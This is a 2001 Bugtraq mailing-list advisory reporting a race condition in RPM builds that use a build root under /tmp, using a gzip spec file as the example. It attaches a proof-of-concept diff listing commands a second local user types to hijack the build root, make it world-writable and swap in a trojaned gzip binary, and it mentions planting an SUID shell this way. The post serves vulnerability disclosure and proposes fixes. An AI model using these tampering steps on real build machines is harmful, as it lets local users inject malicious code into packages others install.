Date: Mon, 19 Mar 2001 18:52:11 +0000 From: Ian Lynagh <igloo@EARTH.LI> Subject: RPM building races To: BUGTRAQ@SECURITYFOCUS.COM --6TrnltStXW4iwmi0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Hi all Today it became necessary for me to build an RPM for the first time. To assist my learning I chose, randomly, gzip and had a look at it's spec file in conjunction with reading the various documentation. The first time I saw the reference to /tmp and /var/tmp I was worried, and still don't see why ./redhat isn't used in the same way as ./debian/tmp is. Looking omre closely at the spec file I saw rm -rf $RPM_BUILD_ROOT %makeinstall bindir=$RPM_BUILD_ROOT/bin gzip.info mkdir -p $RPM_BUILD_ROOT/usr/bin which immediately flashed warning lights about races. In this case rm -rf $RPM_BUILD_ROOT mkdir -p `dirname $RPM_BUILD_ROOT` mkdir $RPM_BUILD_ROOT %makeinstall bindir=$RPM_BUILD_ROOT/bin gzip.info mkdir -p $RPM_BUILD_ROOT/usr/bin would have been safe (I believe) as the mkdir without -p will fail if the directory exists. This allows you to alter the files in the package, for example such that whenever anyone ran the command you got a shell SUID their UID, if you have a shell on the machine the package is built on while it is being built. Certainly in the case of gzip this is not an easy race to exploit, but it exists all the same. I have attached a patch against gzip-1.3-6 from RedHat which pauses the build process at various points and lists commands that will build a gzip RPM in which the gzip binary simply echos foo. To exploit this race for real is difficult, and you need an account on the machine in question, but even so I think problems like these should be fixed. There may also be easier races in other packages. I am not overly familiar with RPM, but I think the easiest solution would be to set the default buildroot on all packages to be something like ./rpm-building/%{package} or, slightly more work, to make sure the buildroot is secure before you do anythign else in there. I have not given vendors advanced warning as their build environments are presumably secure, while it is the many sysadmins building RPMs out there on user machines who are the ones under threat. I haven't looked at other packages or RPM based distributions at all. Take care Ian --6TrnltStXW4iwmi0 Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename="gzip.spec.diff" --- gzip.spec.orig Mon Mar 19 18:18:14 2001 +++ gzip.spec Mon Mar 19 18:37:55 2001 @@ -32,14 +32,37 @@ make gzip.info %clean +echo " +As another user, type +rm -rf $RPM_BUILD_ROOT +and press enter" +read WAIT rm -rf $RPM_BUILD_ROOT %install rm -rf $RPM_BUILD_ROOT +echo " +As another user, type +mkdir -p $RPM_BUILD_ROOT/usr/share/man/man1 +ln -s /tmp $RPM_BUILD_ROOT/usr/share/doc +mkdir $RPM_BUILD_ROOT/usr/bin +mkdir $RPM_BUILD_ROOT/bin +mkdir $RPM_BUILD_ROOT/usr/share/info +chmod -R a+rwx $RPM_BUILD_ROOT +and then press enter" +read WAIT %makeinstall bindir=$RPM_BUILD_ROOT/bin gzip.info mkdir -p $RPM_BUILD_ROOT/usr/bin ln -sf ../../bin/gzip $RPM_BUILD_ROOT/usr/bin/gzip ln -sf ../../bin/gunzip $RPM_BUILD_ROOT/usr/bin/gunzip +echo " +As another user, type +rm -f $RPM_BUILD_ROOT/bin/gzip +echo #\!/bin/sh > $RPM_BUILD_ROOT/bin/gzip +echo echo foo >> $RPM_BUILD_ROOT/bin/gzip +chmod +x $RPM_BUILD_ROOT/bin/gzip +and then press enter" +read WAIT for i in zcmp zegrep zforce zless znew gzexe zdiff zfgrep zgrep zmore ; do mv $RPM_BUILD_ROOT/bin/$i $RPM_BUILD_ROOT/usr/bin/$i --6TrnltStXW4iwmi0--